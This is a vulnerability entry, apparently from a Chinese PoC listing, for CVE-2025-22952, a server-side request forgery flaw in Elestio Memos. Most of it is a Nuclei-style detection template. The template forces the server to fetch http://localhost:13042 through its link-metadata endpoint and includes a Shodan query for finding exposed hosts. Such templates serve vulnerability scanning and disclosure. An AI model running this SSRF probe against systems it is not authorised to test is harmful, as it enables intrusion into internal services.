漏洞描述
elestio memos v0.23.0 is vulnerable to Server-Side Request Forgery (SSRF) due to insufficient validation of user-supplied URLs, which can be exploited to perform SSRF attacks.
CVE-2025-22952: Elestio Memos <= v0.24.0 - Server-Side Request Forgery
PoC代码[已公开]
id: CVE-2025-22952
info:
name: Elestio Memos <= v0.24.0 - Server-Side Request Forgery
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
elestio memos v0.23.0 is vulnerable to Server-Side Request Forgery (SSRF) due to insufficient validation of user-supplied URLs, which can be exploited to perform SSRF attacks.
reference:
- https://github.com/advisories/GHSA-wfxg-v3j4-7qmj
- https://elest.io/open-source/memos
- https://github.com/usememos/memos
- https://github.com/usememos/memos/issues/4413
- https://github.com/usememos/memos/pull/4428
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-22952
cwe-id: CWE-918
epss-score: 0.31516
epss-percentile: 0.96644
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1924700661
tags: cve,cve2025,elestio,memos,ssrf,oast
http:
- raw:
- |
GET /api/v1/markdown/link:metadata?link=http://localhost:13042 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'localhost:13042'
- 'connect: connection refused'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 500
# digest: 4a0a0047304502210084078a4149da91a4fb218a4af20258ccf37e84663796e00dedfbc1a702ca6f600220571a7be42699cdc85b2a6e8e4b7729506280c946441d7b9b16ec4695ef2d60ee:922c64590222798bb761d5b6d8e72950